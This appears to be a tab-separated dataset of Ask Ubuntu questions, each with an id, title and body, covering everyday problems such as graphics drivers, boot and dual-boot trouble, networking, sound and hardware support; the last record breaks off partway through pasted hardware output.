225138	ca n't log in on boot up	i set this computer up with ubuntu for my neighbor about two years ago . today she tried her normal boot up and log in and her password is n't accepted . i 've double checked and she 's using what i set her up to use , the caps lock key is okay , and i ca n't see any other reason for the problem . i 'm not sure exactly what version of ubuntu she has and i 'm not an expert user myself . is there a way to bypass the password screen on boot up that would let me get to ubuntu and perhaps set her up as another user ? she basically checks email and that 's about it . thanks for any assistance .
225141	driver for nvidia gtx650 ?	after installing a new nividia gtx650 graphics card in my ubuntu 12.04 desktop , i am stuck with 640x480 resolution . this desktop pc is comprised of : asus m4a78t-e motherboard nividia gtx650 graphics card 16gb ram 500gb ide hard drive and ide cd rw drive i have tried solutions the following solution with no success : nvidia driver problem with 12.04 anyone have any ideas that may help ?
225147	how to run conky from terminal ?	in this unixmen tutorial there are 11 steps to setup conky ; i did all of them but the terminal show this message : the program 'conky ' can be found in the following packages : * conky-cli * conky-std try : sudo apt-get install < selected package > i then try this but saw this message : ismail @ ismail-asus : ~ $ sudo apt-get install conky [ sudo ] password for ismail : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? can you help me ?
225148	ubuntu 12.04 server ping gateway responds with destination host unreachable	i consider myself fairly avid with ubuntu and linux , but this one has me stumped . i built up a xen server using ubuntu 12.04 as the base operating system . it has multiple domus running on it . my home network has a statically defined network where i got all the network connectivity going peachy . the server was moved to a permanent home this morning . so , the network configuration on the main system had to change . again , another static network , but now i ca n't ping the upstream gateway from the host . as the vms use this nic over a bridge , they too are broken . ping responds with `` destination host unreachable . '' i simplified the networking down to a simple static network as seen below ( no bridge or anything ) just to get it to work . here 's the contents of my /etc/network/interfaces file : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 216.7.188.228 gateway 216.7.188.225 netmask 255.255.255.240 broadcast 216.7.188.255 network 216.7.188.0 dns-nameservers 8.8.8.8 8.8.4.4 here 's the contents of route -n 0.0.0.0 216.7.188.225 0.0.0.0 ug 100 0 0 eth0 216.7.188.224 0.0.0.0 255.255.255.240 u 0 0 0 eth0 and the results of pinging the gateway : ping 216.7.188.225 ( 216.7.188.225 ) 56 ( 84 ) bytes of data . from 216.7.188.228 icmp_seq=1 destination host unreachable from 216.7.188.228 icmp_seq=1 destination host unreachable from 216.7.188.228 icmp_seq=1 destination host unreachable again , this worked in one network flawlessly ( obviously with different parameters in the interfaces file ) . i did try using eth1 ( as there are two nics on the server ( in case the mac address got flipped on bootup ) . no success there . yes , the cable is in the right port now : ) any thoughts ? i appreciate the help ! further investigation resulted in finding out the following characteristics . grub gives you two main boot options after xen is installed . one for the vanilla kernel without xen , and one with xen . the default is to use the xen boot configuration . if i use the vanilla kernel option , with no xen , networking is just fine . if i use the xen option , networking breaks . i compared the routing tables for the two setups with `` route -n '' and they are identical . the /etc/network/interfaces file has n't changed . so , it must be something to do with the way the bridge is setup , or xen performs it 's network initialization . this is diving into an area i 'm unfamiliar with . can anyone give me an idea how to proceed solving this problem ? otherwise , i have to bail on xen ( which i do n't want to do ) and try virtualbox instead . this is horribly frustrating .
225156	how can i easily type full width alphanumeric unicode characters ?	how to easy type in ｆｕｌｌ－ｗｉｄｔｈ ａｌｐｈａｎｕｍｅｒｉｃ way in ubuntu ? full-width characters are those from u+ff00 to u+ffef is it possible by using ibus or japanese keyboard layout ?
225158	`` error in main glxinfo is not installed . please install mesa-utils package '' when trying to install playonlinux	i am currently trying to install league of legends using playonlinux , but every time i do i get this error : error in main glxinfo is not installed . please install mesa-utils package what should i do to fix this ? i am using ubuntu 12.10 .
225160	installation troubleshooting	i have installed ubuntu 12.10 on my laptop to a folder named ubuntu in c drive . however the os does not show up in the initial boot sequence . do i need to change the file location/ convert it into a cd/dvd , if so how ?
225168	vlc and other multi media problems	i 've tried numerous free multimedia applications on ubuntu and i get the same result when i watch one of my movies off my other hard drive . it always ends up full screening with a stuck image in the middle , while vlc ends up looking pitch black . on the bottom of my question you 'll find two pictures demonstrating my issue . i 've looked all over the web for this issue and i 'm wondering if anyone is experiencing the same problems . it may have to do with my dual monitor setup . i 've also tried adding and re adding the repositories but it seems to be doing the same repetitive thing for over a month now . do i need to reinstall the whole system or what ? could anyone be of any help here ? thank you , mrmagu . my xorg conf file nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.37 ( buildd @ allspice ) sun sep 9 05:59:26 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-1 : nvidia-auto-select +1920+0 ; dfp-0 : 1920x1080 +0+0 , dfp-1 : 1920x1080 +1920+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1920x1080 +0+0 ; dfp-0 : 1920x1080_60 +0+0 ; dfp-0 : 1680x1050 +0+0 ; dfp-0 : 1680x1050_60 +0+0 ; dfp-0 : 1440x900 +0+0 ; dfp-0 : 1440x900_60 +0+0 ; dfp-0 : 1280x1024 +0+0 ; dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1280x1024_60 +0+0 ; dfp-0 : 1280x960 +0+0 ; dfp-0 : 1280x960_60 +0+0 ; dfp-0 : 1152x864 +0+0 ; dfp-0 : 1152x864_75 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768_75 +0+0 ; dfp-0 : 1024x768_70 +0+0 ; dfp-0 : 1024x768_60 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_75 +0+0 ; dfp-0 : 800x600_72 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 800x600_56 +0+0 ; dfp-0 : 640x480 +0+0 ; dfp-0 : 640x480_75 +0+0 ; dfp-0 : 640x480_72 +0+0 ; dfp-0 : 640x480_60 +0+0 ; dfp-0 : nvidia-auto-select @ 1920x720 +0+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1920x1080 +0+0 ; dfp-0 : 1920x1080_60 +0+0 ; dfp-0 : 1680x1050 +0+0 ; dfp-0 : 1680x1050_60 +0+0 ; dfp-0 : 1440x900 +0+0 ; dfp-0 : 1440x900_60 +0+0 ; dfp-0 : 1280x1024 +0+0 ; dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1280x1024_60 +0+0 ; dfp-0 : 1280x960 +0+0 ; dfp-0 : 1280x960_60 +0+0 ; dfp-0 : 1152x864 +0+0 ; dfp-0 : 1152x864_75 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768_75 +0+0 ; dfp-0 : 1024x768_70 +0+0 ; dfp-0 : 1024x768_60 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_75 +0+0 ; dfp-0 : 800x600_72 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 800x600_56 +0+0 ; dfp-0 : 640x480 +0+0 ; dfp-0 : 640x480_75 +0+0 ; dfp-0 : 640x480_72 +0+0 ; dfp-0 : 640x480_60 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-1 : 1920x1080 +1920+0 ; dfp-0 : 1920x1080 +0+0 , dfp-1 : nvidia-auto-select +1920+0 ; dfp-0 : 1920x1080_60 +0+0 ; dfp-0 : 1680x1050 +0+0 ; dfp-0 : 1680x1050_60 +0+0 ; dfp-0 : 1440x900 +0+0 ; dfp-0 : 1440x900_60 +0+0 ; dfp-0 : 1280x1024 +0+0 ; dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1280x1024_60 +0+0 ; dfp-0 : 1280x960 +0+0 ; dfp-0 : 1280x960_60 +0+0 ; dfp-0 : 1152x864 +0+0 ; dfp-0 : 1152x864_75 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768_75 +0+0 ; dfp-0 : 1024x768_70 +0+0 ; dfp-0 : 1024x768_60 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_75 +0+0 ; dfp-0 : 800x600_72 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 800x600_56 +0+0 ; dfp-0 : 640x480 +0+0 ; dfp-0 : 640x480_75 +0+0 ; dfp-0 : 640x480_72 +0+0 ; dfp-0 : 640x480_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-1 : 1920x1080 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` inputclass '' identifier `` mouse remap '' matchproduct `` saitek cyborg r.a.t.7 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 6 7 8 9 0 0 0 0 0 0 '' endsection pictures picture # 1 picture # 2 - vlc
225170	video driver under lxc container ?	since lxc ( linux containers ) is a kernel level super-chroot , i 've been wondering what sort of video driver the containers have : my host is ubuntu 12.04 64-bit machine with ati gpu . will the lxc container have access to the same driver ? or do they need to be installed on each container ?
225173	help with creating bootable usb from iso	-- all this is about terminal -- i know some of you will laugh , but i 'm trying to install arch linux , since i want to learn as much as i can about linux system and how it works . i want to be an expert ( maybe in 1000 years , but that 's okay : ) ) . the problem is that even tho i know how to do some stuff under linux i 'm having a hard time with those names about hard drives , usb , cd , blah blah and how to access them . big introduction and no question yet , but the purpose is for you to see where i 'm standing and give me as many details as possible . and here 's the question : how can i put the .iso file in a usb that will run on computers startup and allow me to install arch linux ? details as to how to turn my pc on and hit f8 or whatever can be discarted lmao : ) ty in advance .
225178	how can i get involved in the ubuntu ( mobile ) dev team ?	like the title states , how can i join the ubuntu mobile development team ? i 'm not too experienced but i 'd like to help out as i enjoy prototyping hardware with ubuntu .
225179	openmpi 1.6.3 on ubuntu 12.10	i manually installed the tar.gz of openmpi 1.6.3 on ubuntu 12.10 . but now mpif90.openmpi returns the following : can not open configuration file /usr/local/share/openmpi/ mpif90.openmpi-wrapper- data.txt error parsing data file mpif90.openmpi : not found how can i get mpif90.openmpi get running again ? it was running fine if i install openmpi using apt-get install . but that way i will get only version 1.6.1 . thanks .
225180	livecd boot failer comm : swapper/0 cant mount vfs	kind of a noob but anyway ... i 'm trying to boot ubuntu 12.10 livecd . i currently have windows 7 x64 installed . i start computer to boot ubuntu livecd and i get kernel panic . something like : can not mount vfs to ( 0,0 ) comm swapper/0 not tainted or something like that . i have no idea what to do !
225186	can i make all the keys work on a logitech n305 keypad	i 'm using a logitech n305 key pad with ubuntu 14.04 and it mostly works but the keys for = ( ) and the 3 function keys seem to return multiple or unhelpful keystrokes . is there a way to make them return = ( ) or some useful function .
225188	no startup sound	despite numerous attempt , and advise , this is what i applied . sudo cp /usr/share/sounds/ubuntu/stereo/* /usr/share/sounds/ type this : cd /dev ls -l |less find 14 , [ 0- ... ] this file for audio you can type cat /etc/passwc > /dev/dsp dsp if speaker device this is not a big deal but i 'm an ocd person , so i would like that it works . an other issue is the screensaver , i can not watch movies . i understand that ubuntu default settings are `` turned off start up sound , and 10 min screensaver auto '' if i would be allowed to a suggestions , it is the followings : is that so problematic to create a check box to check or un check this futures , just to be able to enjoy your product fully ? furthermore i 'm reading a lot of similar issues on blogs ... annoying
225189	hard drive encryption boot screen resolution	i have ubuntu 12.10 on a lenovo laptop . the laptop itself is installed in a dock , with two external monitors attached to the dock . i do n't use the laptop screen itself . when i boot , i have an annoyance - the framebuffer screen that comes up asking me to input my passphrase to utilize the encrypted hard drive is at a different resolution than is optimal for my external monitor . as a result , the screen is chopped off on the left and right ( slightly ) . i 'm wondering if there 's a way to get this screen to a different resolution ( or , ideally , auto-detect my resolution ) .
225192	ubuntu 12.10 and dual boot with windows 8 uefi on sony vaio svs1512	i 've spent the whole day trying to get windows 8 to dual boot with ubuntu on my sony vaio svs1512z9eb . i tried boot-repair as mentioned in many other threads but it still only boots windows 8 . you can view my url here is there anything to do to get the dual boot ? thanks
225198	hibernate windows with wubi	i want to install ubuntu alongside windows7 using wubi installer . i hear that hibernation is disabled . my question is '' is hibernation disabled for ubuntu only or for both windows and ubuntu ? ''
225201	compiling a shared library	i 'm doing a 64-bit rewrite of some code i wrote that implements a novel approach to genetic algorithms that i want to turn into a shared library exclusive to ubuntu using code : :blocks/gcc . i have successfully made the project using the shared library stationary and when i compile i get my .so file . so far so good . now i seem to remember i need an import library in order to link to the code in .so from my caller programme and there is an option for this checked in project- > properties- > build targets . i think i am along the right track , but my question is what do i do next ? where does the import library go and what do i need to do in my caller programme to call the code . also am i right to think i can export classes as well as just variables and functions ? if so how do i declare the exported code and the imports in the caller code ?
225207	ubuntu install black screen - nomodeset not working	i just bought asus ux42vs and i am have troubles installing ubuntu 12.10 . after booting from usb or cd , whatever i select in the grub menu , the screen goes black and the computer does nothing . i have already tried to edit grub settings with nospalsh noguiet nomodeset but it did not help . can you please help ?
225208	bluetooth not found on bcm43228	i 've got a broadcom bcm43228 mpcie card which came with my motherboard ( asus rog maximus v extreme , ca n't seem to find a link to what the card is ) which is working great for wifi right now , but i ca n't detect the bluetooth hardware onboard . in windows , i have full bluetooth 4.0 support . $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.4 pci bridge : intel corporation panther point pci express root port 5 ( rev c4 ) 00:1c.6 pci bridge : intel corporation panther point pci express root port 7 ( rev c4 ) 00:1c.7 pci bridge : intel corporation panther point pci express root port 8 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 1189 ( rev a1 ) 01:00.1 audio device : nvidia corporation device 0e0a ( rev a1 ) 0d:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 0e:00.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:01.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:04.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:05.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:06.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:07.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:08.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 0f:09.0 pci bridge : plx technology , inc. pex 8608 8-lane , 8-port pci express gen 2 ( 5.0 gt/s ) switch ( rev ba ) 10:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 12:00.0 sata controller : asmedia technology inc. asm1062 serial ata controller ( rev 01 ) 15:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n 17:00.0 sata controller : asmedia technology inc. asm1062 serial ata controller ( rev 01 ) the key line seems to be : 15:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n if i try to detect the bluetooth card , i do n't see anything : $ hcitool dev devices : $ rfkill list all output $ lspci output $ lsusb output i finally found the card with usb-devices : t : bus=01 lev=02 prnt=02 port=00 cnt=01 dev # = 3 spd=12 mxch= 0 d : ver= 2.00 cls=ff ( vend . ) sub=01 prot=01 mxps=64 # cfgs= 1 p : vendor=0b05 prodid=17b5 rev=01.12 s : manufacturer=broadcom corp s : product=bcm20702a0 s : serialnumber= # # # # # # # # # # # # c : # ifs= 4 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=01 prot=01 driver= ( none ) i : if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=01 prot=01 driver= ( none ) i : if # = 2 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver= ( none ) i : if # = 3 alt= 0 # eps= 0 cls=fe ( app. ) sub=01 prot=01 driver= ( none ) i 'm running kernel 3.2.0-34-generic . i 've heard that this card needs to have firmware injected into it in order to function . if that 's the case , how do i do it ?
225217	usb security dongle does n't get recognised in ubuntu 12.04	i have an accounting software that runs on windows and ( as per the advice of the user support ) ubuntu . the software comes with a usb dongle which is required to run the software . my problem is that ubuntu does n't recognise the dongle at all , even though i can see the device listed in lsusb command . help , anyone ? thanks , josh
225222	update from my windows side ?	i wanted to know if it is possible to update ubuntu from my the windows side of my computer ( i dual boot ) . the ubuntu side is a wubi install . the reason is i accidentally deleted the wireless driver for my broadcom wireless card thinking i was replacing it . as i had no ethernet driver installed , i currently have no access to the internet from my ubuntu side . i am relatively new to linux so please do n't be too hard on me haha . i just really want to upgrade to 12.10 so , hopefully , this problem can be resolved in the update . thank you for your help in advance .
225225	is there any way to create a lxde customized panel as a launcher ?	i am currently using ( and enjoying ) lubuntu 12.10 on an older desktop , since the last time i tested it , it has improved a lot , but i really got used to unity workflow and it has become quite an habit to manage applications and windows with the launcher . using synapse as an attempt to replace dash , i already created a panel on the left margin of the desktop with the shortcuts to my favorite programs , but they only open the apps , the window management is still made on the bottom panel . i tried to use this default bottom panel on the left but the results were not satisfatory . besides , some applications still make use of tray icons on the bottom panel , like dropbox . i dont really mind if i have to keep using the tray icons , i can just autohide the panel and reveal it when i need it , my main concern is to manage opened windows on the left customized panel instead of the default one . here it is a screenshot to help me clarify what i am trying to do . http : //imm.io/nuqt
225226	can we install xcache 2.0 or 3 on ubuntu 12.04 ?	xcache have already reached the version 3.0 . but in ubuntu 12.04 , we still have version 1 . how can we install xcache 2 or 3 in ubuntu 12.04 ?
225229	uninstalling skype 4.1 from 12.10	i want to completely uninstall skype 4.1 from the terminal . how do i do that . also , do i have to delete anything else to make sure i have removed it completely ?
225231	mac mini 6,1 ubuntu server	i 'm having some issues installing ubuntu server on my mac mini 6,1 . it does boot on the usb stick , install run smoothly but then after i have a 'no operating system found ' message when i try to boot . i 've tried with & without efi boot partition , setting it as bootable or not . i 'm starting to be out of ideas to make it work . i 'd like to install it as the only system . thanks ,
225242	can i partition with my live usb key ?	i have a live usb created from linuxliveusb . i have win 7 installed and have 60 gb of unallocated space . i would like to install my ubuntu ( 12.04 ) in a primary partition ( since someone instructed me to install my linux in a primary partition , but need your views on this ) . i have only one primary partition and have win7 installed on it . partitioning in native win 7 disk management only creates logical drive . so , i decided to use linux partitioning tool while installing . i have following questions which i need clarification 1 ) if i use install time advanced manual partitioning in a live usb installation , will it reflect permanently ? 2 ) should i use primary partition for ubuntu installation ? if yes , how can i create primary partition during installation . 3 ) i have n't tried a usb installation myself , but i oversaw an usb installation in another machine in which , grub got installed in the usb and not in the hard drive . this created some problems , and the installation has to be repeated with fresh formatting . i 'm slightly apprehensive of installing from usb ( but i do n't have cd installation option either ) and would need some pointers on what cautionary measures i should take during usb installation ? any help will be appreciated .
225244	restoring grub ?	i primarily use ubuntu 12.10 , however i recently installed the beta of fedora 18 to test it out . grub was replaced with the `` fedora 18 grub '' which looks slightly different . how do i restore the version of grub that comes with ubuntu ?
225247	copy files and folders to nexus 7 from kubuntu	when i connect my nexus 7 to my kubuntu laptop it shows up as a camera instead of a drive . i am running kubuntu 12.10 and am fully up to date with my nexus7.i would like to copy files over to it . on my mac i use the android file manager app to perform this but would like to be able to copy from my laptop to my nexus . thanks in advance
225250	how do i install oracle jdk 7 on ubuntu server 12.04 ?	folks , i 'm new in ubuntu server . as i understand it , oracle retired the operating system distributor 's license for java , meaning that canonical could no longer include the jdk or jre in their apt repositories . this means no more `` sudo apt-get install sun-java-whatever '' . i just following this tutorial and other question but i still ca n't installing the jdk . how do i install oracle jdk 7 on ubuntu server 12.04 ? thanks in advance
225251	ubuntu restarts nightly at 12:00 est . why ?	title says it all really . but every night , unless i 'm actively using it , my computer restarts , and every time , at midnight . i was wondering if their is anything i can do to stop it , or to find out what 's actually causing it , or any help in general . i 'm using 12.04 lts .
225255	what is the workaround for medtronic carelink ubuntu compatibility ?	i am taking a wild shot here : i am a type 1 diabetic who is going on the insulin pump . unfortunately , the medtronic carelink usb device that uploads data from the pump online only has windows drivers . has anybody managed to get this working under ubuntu using wine or by any other method ? lsusb yields : bus 001 device 014 : id 0a21:8001 medtronic physio control corp. mmt-7305ww [ medtronic minimed carelink ] i really do n't want to buy a windows machine just for this , but it 's probably one in a million that somebody else has managed to make this work under linux .
225256	ca n't find some software ( like adobe reader ) in the usc	i just installed ubuntu 12.04 lts and i am not able to find adobe reader or gnu plot in the software centre . when i try to get all updates , the process goes through till about 95 % and then does n't proceed . hence , i had to stop it there . can someone please help me to install these software 's . and also let me know why i am unable to view these on the software center screen .
225258	apt-get install does not work . gives the same error every time e : unable to locate package	there is an issue , for every package that i try to install . i am using vmware player 3.16 & i have installed ubuntu 12.04 . the error is : e : unable to locate package ( package name ) also , another problem is that there are some configuration errors . so i have to use the cli rather than the gui . now if this is a network error , i 'm not sure as to how to open the setting from the command prompt . even if i get to the gui , it might not work , as the shortcuts are not available .
225261	how to run an application source code on ubuntu ?	i am a new user on ubuntu . my project is to modify an application source code on ubuntu . i had already download an application source code which is using c++ . firstly i need to check whether the original source code can run successfully , how to run it on ubuntu ?
225266	ubuntu 12.10 + gnome 3 = keyboard layout indicator is not working !	i have two keyboard layouts , but keyboard layout indicator is only visible on login screen . after i login to system , i could not see it anymore ! my problem is almost the same as following : question # 195194 but , i have the latest release of gnome shell , from official gnome team repository : sudo add-apt-repository ppa : gnome3-team/gnome3 and other packages have the latest versions as well , so i doubt that this error happens because of a bug . already tried the instructions mentioned in this thread : gnome3 keyboard layout icon disappeared especially the gnome-tweak-tool . still unable to see keyboard layout indicator . please tell me , how to fix this error ?
225271	stream sound card output to icecast2 via darkice	i want to stream to icecast server via darkice , the default .cfg comes with /dev/dsp , witch is oss , but there is no /dev/dsp in ubuntu 12.10 , so i tried hw:0,0 , but it 's just the microphone , and i would like to stream all of the sound-card output . any ideas ? cat /proc/asound/cards 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xf8700000 irq 16 cat /proc/asound/devices 1 : : sequencer 2 : [ 0- 0 ] : digital audio playback 3 : [ 0- 0 ] : digital audio capture 4 : [ 0- 0 ] : hardware dependent 5 : [ 0 ] : control 33 : : timer i tried following this post : how can i stream my soundcard output ?
225275	cpu rendering graphics instead of ati hd 5470	ubuntu 12.10 is really burning my laptop.i have an vaio laptop with ati hd 5470 , i3 370m processor.processor is used to render unity launcher transparent windows.cpu usage is close to 100 whenever i use unity launcher or watch a video.i think cpu is being used to do all the rendering .
225276	how to bind function key char sequence to their respective button to be recognized by tty terminal ?	according to this question tty only recognize character input and the rest of function keys f [ 1-12 ] as a char sequence . i have a cui application runs over wineconsole and expects a f12 key press , all is executed on tty session ( ctrl+alt+f [ 1-6 ] ) . now i can send the expected char sequence for the f12 using ctrl+ [ [ 24~ or esc [ 24~ but that would be counter-intuitive and less memorable to send a function key using their char sequence . so my question : is there any way that i can bind or config the tty terminal to recognize an f12 keypress ( and the rest of the function keys ) as ... well as an f12 . here is the output of my f12 keypress using showkey command in tty terminal kb mode was unicode [ if you are trying this under x , it might not work since the x server is also reading /dev/console ] press any key ( program terminates 10s after last keypress ) ... keycode 28 release keycode 88 press keycode 88 release and here is the output of the tput f1 ^ [ [ [ a f2 ^ [ [ [ b f3 ^ [ [ [ c f4 ^ [ [ [ d f5 ^ [ [ [ e f6 ^ [ [ 17~ f7 ^ [ [ 18~ f8 ^ [ [ 19~ f9 ^ [ [ 20~ f10 ^ [ [ 21~ f11 ^ [ [ 23~ f12 ^ [ [ 24~ thanks in advance
225281	ubuntu 12.10 web app integration not working when firefox is closed ?	i just started using web app integration for facebook and gmail . the apps work only when gmail/facebook is open in firefox . what 's the point if it only works when the website is already open ?
225287	can not connect to 802.1x no ipv4 is set although dhcp	can anybody please help me to setup my internet . i made a fresh install of ubuntu 12.04 lts . before the installation i was able to connect to the internet with the notebook . i have to use 802.1x to connect . i have no idea what to do anymore . somehow i do n't have an ipv4 listed which could be the problem but why is this the case this worked before a install on linux mint 13 too.. joachim @ joachim-travelmate-5744 : ~ $ sudo lshw [ sudo ] password for joachim : joachim-travelmate-5744 description : notebook product : travelmate 5744 ( calpella_crb ) vendor : acer version : v1.06 serial : nxv5meg00521605c8c7200 width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : chassis=notebook family=intel_mobile sku=calpella_crb ... *-core description : motherboard product : ba52_cp vendor : acer physical id : 0 version : type2 - board version serial : type2 - board serial number slot : type2 - board chassis location *-firmware description : bios vendor : insyde corp. physical id : 0 version : v1.06 date : 011/21/2011 size : 1mib capacity : 1984kib capabilities : pci upgrade shadowing cdboot bootselect edd int13flopp ... *-memory description : system memory physical id : 18 slot : system board or motherboard size : 4gib *-bank:0 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) [ empty ] physical id : 0 serial : 00000000 slot : dimm0 width : 8 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : ebj41uf8bcs0-dj-f vendor : elpida physical id : 1 serial : 5a341c9a slot : dimm1 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-cpu description : cpu product : intel ( r ) core ( tm ) i3 cpu m 380 @ 2.53ghz vendor : intel corp. physical id : 20 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i3 cpu m 380 @ 2.53ghz slot : u3e1 size : 933mhz capacity : 4ghz width : 64 bits capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae ... . configuration : cores=2 enabledcores=2 threads=4 *-cache:0 description : l3 cache physical id : 21 slot : l3 cache size : 3mib capacity : 3mib capabilities : synchronous internal write-through unified *-cache:1 description : l2 cache physical id : 23 slot : l2 cache size : 512kib capabilities : synchronous internal write-through unified *-cache:2 description : l1 cache physical id : 24 slot : l1 cache size : 64kib capabilities : synchronous internal write-through instruction *-cache description : l1 cache physical id : 22 slot : l1 cache size : 64kib capabilities : synchronous internal write-through data *-pci:0 description : host bridge product : core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : d0000000-d03fffff ... *-communication description : communication controller product : 5 series/3400 series chipset heci controller vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:41 memory : d0604000-d060400f *-usb:0 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : d060a000-d060a3ff *-multimedia description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:43 memory : d0600000-d0603fff *-pci:0 description : pci bridge product : 5 series/3400 series chipset pci express root port 